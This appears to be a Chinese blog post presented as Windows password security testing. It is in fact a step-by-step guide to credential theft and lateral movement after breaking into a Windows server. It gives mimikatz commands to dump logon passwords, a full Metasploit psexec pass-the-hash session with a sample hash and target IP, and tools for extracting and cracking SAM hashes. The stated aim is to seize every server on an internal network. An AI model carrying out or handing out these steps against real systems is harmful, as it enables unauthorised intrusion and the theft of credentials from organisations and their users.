windows密码安全性测试

在渗透测试内网环境下,拿到了windows服务器,为啥要去拿到对方管理员密码呢?把这些获得到了账号密码挂在到像绿盟的扫描器里,我们可以针对整个内网进行弱口令探测,这样我们可以批量拿下整个内网的其他服务器

.1)本地管理员密码如何直接获取

拿下了服务器后,直接通过mimikatz(法国大面包)读取管理员密码

第一条命令:privilige::debug(提升权限)

第二条命令:sekurlsa::logonpassWords(抓取密码)

附:emmmmm....windows有32位和64位的,区别对待。

不支持交互式,不能在webshell下抓取密码。

有一个缺点:在管理员改了密码之后,并且尚未重新登陆,你是再次获取不到新  密码的,我们可以通过别的工具,使用hash方法得到密码,但是有些复杂的hash,你也破解不了

2)利用hash远程登录系统,主要是通过MSF提供的exploit/winsows/smb/psexec

模块来完成。

kali中打开metasploit

命令:

msf>use exploit/windows/smb/psexec

msf>set RHOST 192.168.1.109(ip是目标主机的)

msf>set SMBUser administrator(目标用户密码)

msf>set SMBPass

44EFCE164AB921CAAAD3B435B514

04EE:32ED87BDB5FDC5E9CBA8854

7376818D4(抓取到的hash密码,当然是上面那个用户的啦)

msf>exploit

//......等待结果//

如果它告诉你获取到了一个会话,我们就得到了一个shell

msf>shell

进入对方终端啦,然后你想怎么干就怎么干

附:show option,查看用法,看看哪些选项需要输入的

3)当前面两种方法还是不行的话,我们....emmmm.....

1.通过LC5暴力破解hash密码,使用gmer直接提取sam和system文件或用Pwdump7

提取hash,最后使用LC5破解(长密码破解不出)

2.使用Ophcrack破解系统hash密码,要挂载彩虹表,安装完是绿色的一个14位的密码十几秒就破出来

可参考

http://simeon.blog.51cto.com/18680/122160

附:

我们管理员账号密码保存是在sam文件中的,有操作系统的所有账号密码,我们把sam文件和system文件拷贝出来后(如果有的不能提取,用gmer靠别),通过工具读里面的hash

其他:

GetPass.exe

命令:直接运行这个程序,切换到程序所在位置,输入:GetPassword >>1.txt(将密码输入到1.txt)

QuarksPwDump_v0.1

可自行百度 使用的命令

你可能感兴趣的:(windows密码安全性测试)